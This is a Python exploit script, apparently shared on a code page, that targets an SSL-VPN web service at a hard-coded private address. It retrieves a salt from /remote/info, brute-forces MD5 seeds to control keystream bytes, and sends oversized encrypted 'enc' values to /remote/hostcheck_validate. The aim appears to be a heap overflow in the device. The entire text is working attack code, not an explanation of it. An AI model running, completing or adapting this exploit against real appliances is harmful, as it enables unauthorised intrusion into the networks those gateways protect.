1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133
| import ssl import time import socket import struct import hashlib
IP = "192.168.229.163" PORT = 4443
p32 = lambda x: struct.pack("<I", x)
def create_ssl_socket(_ip, _port): _socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) _socket.connect((_ip, _port)) _context = ssl._create_unverified_context() _ssl_socket = _context.wrap_socket(_socket) return _ssl_socket
class Expliot(object): def __init__(self, _ip, _port): self.ip = _ip self.port = _port self.salt = None
def get_salt(self, _socket): _request = """GET /remote/info HTTP/1.1\r\nHost: %s:%d\r\nConnection: close\r\n\r\n""" % (self.ip, self.port) _socket.sendall(_request.encode()) if b"salt" not in (salt := _socket.recv(1024)): print("[-] Get salt fault") exit(0) self.salt = salt[salt.find(b"salt")+6:salt.find(b"salt")+14] def calc_packet_data_size(self, _size): self.BLOCK_HEAD = 0x18 self.PACKET_SIZE = _size self.DISTANCE = self.PACKET_SIZE - self.BLOCK_HEAD - 6 alloc_size = self.PACKET_SIZE alloc_size -= self.BLOCK_HEAD inlen = (alloc_size - 1) << 1 inlen_data = inlen - 12 inlen_unhex = inlen_data >> 1
self.packet_data_size = inlen_unhex def calc_md5(self, _seed): assert len(_seed) == 8
return hashlib.md5(self.salt + _seed + b"GCC is the GNU Compiler Collection.").digest()
def create_payload(self, size=None, _seed="00000000"): md5 = self.calc_md5(_seed.encode()) max_size = self.packet_data_size * 2
if size is None: size = max_size elif size > max_size: print("create_payload: size > max_size") exit(0) len_high = (size >> 8) ^ md5[1] len_low = (size & 0xFF) ^ md5[0]
data = bytes((len_low, len_high)) + b"1" * self.packet_data_size print(hex(size)) print(hex(size & 0xFF)) print(hex(size >> 8)) payload = _seed + data.hex()
return payload def get_seed_for_md5_byte(self, pos, value): distance = self.DISTANCE + pos distance += 2 MD5_LEN = 16 rounds, offset = divmod(distance, MD5_LEN) print(self.DISTANCE) print(divmod(distance, MD5_LEN)) md5 = hashlib.md5
for _seed in range(2**24): _seed = "00" + p32(_seed)[:3].hex() hash = self.calc_md5(_seed.encode()) keystream = hash for i in range(rounds): hash = md5(hash).digest() keystream += hash if hash[offset] == value: print(_seed) print(keystream[self.DISTANCE + 2 : self.DISTANCE + 2 + pos + 1].hex()) return _seed, keystream[self.DISTANCE + 2 : self.DISTANCE + 2 + pos + 1] print("[-] unable to get seed") exit(0) def send_payload(self, _sock, _data): _data = "ajax=1&username=asdf&realm=&enc=%s" % _data if len(_data) > 0x10000: print("[-] payload too long") exit(0) _request = """POST /remote/hostcheck_validate HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0\r\nContent-Type: text/plain;charset=UTF-8\r\nConnection: keep-alive\r\nContent-Length: %d\r\n\r\n%s""" % (self.ip, self.port, len(_data), _data) _sock.sendall(_request.encode()) _responce = _sock.recv(2048)
if __name__ == '__main__': exp = Expliot(IP, PORT) salt_sock = create_ssl_socket(IP, PORT) exp.get_salt(salt_sock) salt_sock.close()
print(exp.salt)
exp.calc_packet_data_size(0x1000)
payload = exp.create_payload()
sock = create_ssl_socket(IP, PORT)
offset = 0x10 value = 0xaa seed, _ = exp.get_seed_for_md5_byte(offset, value) payload = exp.create_payload(exp.DISTANCE+offset, seed) exp.send_payload(sock, payload) payload = exp.create_payload(exp.DISTANCE+offset+1, seed) exp.send_payload(sock, payload) sock.close()
|